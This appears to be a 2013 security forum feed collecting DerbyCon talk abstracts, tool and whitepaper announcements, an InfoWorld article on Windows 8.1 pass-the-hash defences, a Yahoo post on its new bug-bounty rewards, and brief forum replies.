For more information please visit: Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Source: Derbycon 2013 - Windows Attacks: AT Is The New Black - Chris Gates & Mubix “Rob” Fuller
-
Lynis Auditing Tool 1.3.1

Authored by Michael Boelen | Site rootkit.nl

Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Besides security-related information it will also scan for general system information, installed packages and configuration mistakes. This software aims at assisting automated auditing, software patch management, vulnerability and malware scanning of Unix-based systems.

Changes: This release has several generic updates, including adjustments of text and fixes in the detection of binaries, including performance tweaks. Several minor adjustments have been implemented to improve several audit checks.

Download: http://packetstormsecurity.com/files/download/123498/lynis-1.3.1.tar.gz

Source: Lynis Auditing Tool 1.3.1 ≈ Packet Storm
-
Derbycon 2013 - Identifying Evil: An Introduction To Reverse Engineering Malware And Other Software - Bart ‘D4ncind4n’ Hopper

Description: “You just discovered a piece of suspicious software. What are your next steps? This talk will explain the fundamentals of malware analysis and reverse engineering. These skills are increasingly needed due to the failures of signature-based malware detection systems, inclusion of undesirable features in common software (grayware), and undocumented features in commercial software. Key topics covered will include typical exploit chains, discovering indicators of compromise, common evasion and obfuscation techniques, and the use of analysis tools and techniques. A gentle introduction to assembly language and Windows API calls will be given to allow the presentation to be of interest for all technical levels.”

Bio: “Bart ‘d4ncingd4n’ Hopper is a security analyst at a financial institution. Prior to his work in security, he was a systems administrator for a healthcare start-up. His training came from the ‘Book of the Month’ club, a quest for knowledge, and the school of hard knocks.”

For more information please visit: Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Source: Derbycon 2013 - Identifying Evil: An Introduction To Reverse Engineering Malware And Other Software - Bart ‘D4ncind4n’ Hopper
-
If you really want to spend money on something, spend it on some books. That is, if you are like me and can't read many pages on a computer and prefer paper; if you don't have that kind of problem, you can find pretty much any book you want as a PDF. Phrack is the only "magazine" worth reading. There would also be this one: "Digital Whisper Security Magazine". The problem is simple: it's not in English, it's in Hebrew.
-
You're old. I work with some meters that have 3 types of firmware on them:

1. Meter firmware - which records the electricity consumption
2. ASM firmware - has an interpreter for a compiled, ASM-like language, which it executes
3. Radio (wireless) firmware - with which it connects to a wireless network and sends the data from the meter

For data encryption, besides the layer 2 encryption, AES or ECC can be used at the application level. Today's electricity meters are not exactly junk.
-
Nmap Development: Re: Hakin9's new Nmap Guide
-
Windows Root Certificate Program members
-
XPATH Injection

Authored by Chetan Soni

This is a brief whitepaper that covers XPATH injection attacks and use cases. In a typical web application architecture, the data is stored on a database server. This database server stores data in various formats, such as an LDAP, XML or RDBMS database. The application queries the server and accesses the information based on the user input. Normally attackers try to extract more information than allowed by manipulating or using the query with specially crafted inputs.

Download: http://packetstormsecurity.com/files/download/123483/xpath-injection.pdf

Source: XPATH Injection ≈ Packet Storm
-
Windows NT native API reference

Example: ZwQuerySystemInformation queries information about the system.

    NTSYSAPI
    NTSTATUS
    NTAPI
    ZwQuerySystemInformation(
        IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
        IN OUT PVOID SystemInformation,
        IN ULONG SystemInformationLength,
        OUT PULONG ReturnLength OPTIONAL
    );

Parameters

SystemInformationClass: The type of system information to be queried. The permitted values are a subset of the enumeration SYSTEM_INFORMATION_CLASS, described in the following section.

SystemInformation: Points to a caller-allocated buffer or variable that receives the requested system information.

SystemInformationLength: The size in bytes of SystemInformation, which the caller should set according to the given SystemInformationClass.

ReturnLength: Optionally points to a variable that receives the number of bytes actually returned to SystemInformation; if SystemInformationLength is too small to contain the available information, the variable is normally set to zero, except for two information classes (6 and 11) when it is set to the number of bytes required for the available information. If this information is not needed, ReturnLength may be a null pointer.

Download: multi-desktop-manager.googlecode.com/files/NativeAPI.pdf
-
My crystal ball is in for repairs, so I can't guess why it isn't working for you; that is why I'd suggest you give me a few more details... What phone do you have? What version of the operating system? What certificates do you have installed? What connection error are you getting?
-
ImmuniWeb® Self-Fuzzer

From: ImmuniWeb® Self-Fuzzer <self-fuzzer () htbridge com>
Date: Thu, 03 Oct 2013 00:47:47 +0400

ImmuniWeb® Self-Fuzzer is a simple Firefox browser extension designed to detect Cross-Site Scripting (XSS) and SQL Injection vulnerabilities in web applications. It demonstrates how rapidly and easily these two most common types of web vulnerabilities can be found even by a person who is not familiar with web security.

ImmuniWeb® Self-Fuzzer is not a web application security scanner or crawler, but a real-time web fuzzer. Once activated by the user in the browser, it follows the user’s HTTP requests and fuzzes them in real time, carefully checking all HTTP parameters passed within the requests. Results of fuzzing are also displayed in real time, notifying the user immediately upon vulnerability detection.

Addon page: https://addons.mozilla.org/en/firefox/addon/immuniweb-self-fuzzer/

White Paper & HowTo: https://www.htbridge.com/publications/immuniweb_self_fuzzer_firefox_extension.html

Source: WebApp Sec: ImmuniWeb® Self-Fuzzer
-
Derbycon 2013 - TMI: How To Attack SharePoint Servers And Tools To Make It Easier - Kevin Johnson And James Jardine

Description: SharePoint has become one of the most common platforms in organizations today. Originally designed for simple content management, it has grown into a workflow, CMS and communication powerhouse that runs on intranets and all over the Internet. While it is powerful, most organizations do not realize the risks it exposes within their organization. Kevin Johnson and James Jardine of Secure Ideas will be walking attendees through the systems available under the SharePoint name, as well as showing ways that penetration testers are able to assess and exploit them. They will also be releasing a series of tools and guidelines to help organizations assess their SharePoint systems.

Bio: “Kevin Johnson is the Chief Executive Officer of Secure Ideas. Kevin has a long history in the IT field including system administration, network architecture and application development. He has been involved in building incident response and forensic teams, architecting security solutions for large enterprises and penetration testing everything from government agencies to Fortune 100 companies. In addition, Kevin is an instructor and author for the SANS Institute and a faculty member at IANS. He is also a contributing blogger at TheMobilityHub. Kevin has performed a large number of trainings, briefings and presentations for both public events and internal trainings. Kevin teaches for the SANS Institute on a number of subjects. He is the author of three classes: SEC542: Web Application Penetration Testing and Ethical Hacking, SEC642: Advanced Web Application Penetration Testing and SEC571: Mobile Device Security. Kevin has also presented at a large number of conventions, meetings and industry events. Some examples of these are: DerbyCon, ShmooCon, DEFCON, Blackhat, ISACA, Infragard and ISSA.

Kevin is also very involved in the open source community. He runs a number of open source projects. These include SamuraiWTF, a web pen-testing environment; Laudanum, a collection of injectable web payloads; Yokoso, an infrastructure fingerprinting project; and a number of others. Kevin is also involved in MobiSec and SH5ARK. Kevin was the founder and lead of the BASE project for Snort before transitioning that to another developer.

James Jardine is a Principal Security Consultant with Secure Ideas, LLC. James has over 12 years of software development experience with over half of that focusing on application security. During his long development history, he has had the opportunity to write large enterprise applications, thick clients, and mobile applications. He has held many roles including senior developer, software architect, and application security expert. In addition, James is an instructor and author for the SANS Institute. He is also a contributing blogger for the Secure Ideas blog, the Jardine Software blog, and the SANS Appsec blog. James has performed a number of trainings and presentations for both public events and internal trainings. James teaches the Dev544: Secure Coding in .Net course at the SANS Institute. He is also a contributing author for that course. James will also be teaching a mobile security course that he co-authored at BlackHat USA 2013. He has also presented on multiple webcasts, at the Kentucky ISSA InfoSec Summit, and BSides Orlando. In addition, James is the co-host of the Professionally Evil Perspective podcast and the Down the Security Rabbithole podcast.

James is also involved in the open source community. He runs a number of open source projects. These include WCSA, a security analyzer for web.config files, and EventValMod, a tool to modify event validation values in .Net. He is also a contributor to the Laudanum project, a collection of injectable web payloads.”

For more information please visit: Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Source: Derbycon 2013 - TMI: How To Attack SharePoint Servers And Tools To Make It Easier - Kevin Johnson And James Jardine
-
Windows 8.1 stops pass-the-hash attacks

Microsoft has armor-plated Windows 8.1 against the most feared attack on the planet. Here are the nitty-gritty details you need to know.

By Roger A. Grimes | InfoWorld

Pass-the-hash (PtH) attacks are among the most feared cyber attacks in the computer world. Many of my largest customers (Fortune 500, government, and so on) have told me it's their No. 1 worry above all other attack types. With PtH and other credential theft attacks, a hacker gains admin control over a computer, steals authentication credentials from disk or memory, and uses those credentials to initiate new connections and logons. Most operating systems are vulnerable to PtH attacks, although Microsoft Windows has certainly been the primary target thanks to its pervasiveness in the corporate environment and the availability of PtH tools.

Attackers using PtH attacks completely compromise just about every network they hit. Pretty much every APT (advanced persistent threat) attack team uses them. Every penetration test team uses them. And the tools to accomplish PtH attacks have only gotten better. That's why the anti-PtH measures built into Windows 8.1 are such a big deal.

Hands off the hash

Before Windows 8.1, the only real mitigations against PtH attacks were:

- Don't let hackers get admin control of your box
- Don't log on with elevated accounts, especially on computers not directly under your control
- Restrict the ability of local accounts to be used over the network
- Restrict what computers can connect to (using firewalls, IPSec, and so on)
- Force a reboot after logging on with an elevated account

Unfortunately, most of these recommendations were difficult for most enterprises to implement without a lot of new policies, procedures, and elbow grease.

On the software side, it's very difficult for any OS, including Windows, to stop PtH attacks while maintaining the SSO (single sign-on) functionality customers absolutely require. Asking users to re-enter their logons every time they want to connect to a new application, service, or drive share is the quickest way to make your OS obsolete.

To the pleasant surprise of a lot of people, Windows 8.1 includes comprehensive pass-the-hash mitigations. While it doesn't completely eliminate the threat, it comes pretty darn close. Here's a summary of the PtH mitigations available in Windows 8.1:

- Strengthened LSASS to prevent hash dumps
- Many processes that used to store credentials in memory no longer do so
- Better methods to restrict local accounts from going over the network
- Programs no longer leave credentials in memory after a user logs out
- Allow RDP (Remote Desktop Protocol) connections to be used without putting the user's credentials on the remotely controlled computer
- Addition of a new Protected Users group, whose members' credentials cannot be used in remote PtH attacks
- Several other OS changes that make PtH attacks far more difficult to achieve (see the Technet summary)

For those who want to drill down and determine how these new anti-PtH measures have been implemented, here's some more detail:

Protecting LSASS

LSASS.exe is the main process used by Windows to verify authentication -- the same process most hacking tools attack to grab authentication credentials out of memory and on the disk. Most hacking tools work by intercepting LSASS and injecting their code into the process. In Windows 8.1, this is no longer possible (or much more difficult, at the very least). LSASS can be made a protected process, which makes it a lot harder to be manipulated by rogue software. Plus, it no longer stores LM hashes or plaintext equivalents in memory (already, Windows doesn't store those types of credentials on disk by default).

Because protection of LSASS may break some legitimate legacy software, this is not enabled by default on anything but Windows 8.1 RT. I recommend that all admins worried about PtH attacks enable this feature after thorough testing.

New security identifiers

There are two new built-in security identifiers, called "Local account" and "Local account and member of the Administrators group." You can place all your local sensitive accounts in these groups, then use them to apply permissions, privileges, and policies. For instance, previous PtH mitigations recommended giving local admin accounts a privilege called Deny Network Logons, which would prevent them from being used to access Active Directory network resources. This is still a great mitigation, but it previously required that each individual account be marked with the denial privilege and that admins keep up with individual adds, moves, and changes. Now you can apply the privilege to the new SIDs and be done with it.

Fixing RDP

One of my biggest pet peeves regarding RDP is that it ends up putting the admin's logon credentials on the remote box being accessed. I used to recommend that admins use just about any other remote admin method (such as MMC or PowerShell) instead of RDP. In Windows 8.1, with the new restrictadmin feature enabled, RDP doesn't put stealable credentials on the remote computer being managed. This is a big win -- enterprises around the world, celebrate!

Protected Users group

Members of the new Protected Users group are significantly harder to exploit in PtH attacks. Members can use only Kerberos, and their credentials cannot be delegated. Yes, Kerberos tickets can be used in credential theft attacks, but attackers aren't nearly as familiar with Kerberos, and the lack of delegation makes PtH attacks far more difficult.

Many of these features are configurable, and they're protected by UEFI and SecureBoot; you can also turn them on and off.

The only caveat I can think of is that all of these new mitigations are currently available only in Windows 8.1 and in Windows Server 2012 R2. I have little doubt customers will want these mitigations back-ported to previous versions, but I have no idea what Microsoft's plans are -- or even if it is reasonably possible to accomplish without causing too many operational problems.

This story, "Windows 8.1 stops pass-the-hash attacks," was originally published at InfoWorld.com. Keep up on the latest developments in network security and read more of Roger Grimes' Security Adviser blog at InfoWorld.com. For the latest business technology news, follow InfoWorld.com on Twitter.

Source: Windows 8.1 stops pass-the-hash attacks | Security - InfoWorld
-
So I’m the guy who sent the t-shirt out as a thank you.

By Ramses Martinez, Director, Yahoo Paranoids

So, I am the guy who started sending t-shirts as a thanks to people when they sent us a potential vulnerability issue. What an interesting 36 hours it has been. Here’s the story.

When I first took over the team that works with the security community on issues and vulnerabilities, we didn’t have a formal process to recognize and reward people who sent issues to us. We were very fast to remedy issues but didn’t have anything formal for thanking people that sent them in. I started sending a t-shirt as a personal “thanks.” It wasn’t a policy, I just thought it would be nice to do something beyond an email. I even bought the shirts with my own money. It wasn’t about the money, just a personal gesture on my behalf. At some point, a few people mentioned they already had a t-shirt from me, so I started buying a gift certificate so they could get another gift of their choice. The other thing people wanted was a letter they could show their boss or client. I write these letters myself.

Most companies offer just a thanks, maybe some schwag, for identifying a potential vulnerability. There are those that offer money. If you’re interested, Bugcrowd.com has a list of what many companies do for bug and vulnerability reports.

Of course, when you work for a company that serves more than 800 million people every month, you take network and user security very seriously. We have a large, dedicated team that looks for security vulnerabilities, as well as taking input from the community. When someone reports an issue or vulnerability to us, we react in a few hours, often minutes. We monitor all external reports 24 hours a day, 7 days a week.

We recently decided to improve the process of vulnerability reporting. My “send a t-shirt” idea needed an upgrade. This month the security team was putting the finishing touches on the revised program. And then yesterday morning “t-shirt-gate” hit. My inbox was full of angry email from people inside and outside of Yahoo. How dare I send just a t-shirt to people as a thanks? So rather than wait any longer, we’ve decided to preview our new vulnerability reporting policy a bit early.

Our updated vulnerability reporting policies address five areas:

1) Reporting - We’re improving the reporting process for bugs and vulnerabilities to allow us to react even quicker and more effectively. Our new site will make sending in issues to us easier, and it will be more clear about the process.

2) Issue Validation - Yahoo’s security team currently reviews all submissions from the community within minutes or at most a few hours. We do this 365 days a year, 24 hours a day. This will not change, but the new reporting process will improve our overall speed and quality.

3) Issue Remediation - Like #2, we already act swiftly to address vulnerabilities or issues affecting our network and customers. Again, this is a 24x7 process for Yahoo, and that will not change. It’s important to note that the vulnerability in question in recent press stories had already been resolved by Yahoo’s security team by the time these stories were written. But with a more clear process, we hope to be even faster here, as well.

4) Recognition - Submitted issues are validated by our team. Upon validation we will contact the reporting individual or organization directly. People will be contacted by Yahoo in no more than fourteen days after submission (but typically much faster). And because we know that formal recognition from Yahoo is often useful to an individual’s career or a firm’s reputation, we will issue a formal recognition of your help either in an email or written letter, as appropriate. For the best reported issues, we will directly call out from our site an individual’s contribution in a “hall of fame.”

5) Reward - Out with t-shirts that I buy. Yahoo will now reward individuals and firms that identify what we classify as new, unique and/or high risk issues between $150 - $15,000. The amount will be determined by a clear system based on a set of defined elements that capture the severity of the issue.

We’re excited to get this new process going and believe it will improve Yahoo’s relationship and effectiveness with the security community. We are committed to further improvements going forward. We take your help on improving the security of our services seriously.

The small print on the revised policy isn’t quite final. We will release the new policy by October 31, 2013. In the meantime, the benefits of the policy will be implemented retroactively back to July 1, 2013. If you submitted something to us and we responded with an acknowledgement (and probably a t-shirt) after July 1st, we will reconnect with you about this new program. This includes, of course, a check for the researchers at High-Tech Bridge who didn’t like my t-shirt.

Source: So I’m the guy who sent the t-shirt out as a thank you. | Yahoo! Developer Network
-
What operating system do you have? Is it fully up to date with updates?